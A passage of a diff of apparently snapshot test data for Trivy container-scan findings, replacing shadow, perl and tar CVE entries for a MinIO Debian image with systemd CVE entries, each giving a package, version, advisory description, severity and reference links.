"http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", - }, - { - "type": "URL", - "value": "http://secunia.com/advisories/27215", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "247.3-7+deb11u2", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", - }, - { - "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", - }, - { - "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2023-31437", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", - }, - { - "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -68775,66 +69524,36 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2023-31438", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", - }, - { - "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - }, - { - "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -68843,4590 +69562,4704 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "id": "CVE-2023-31439", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": 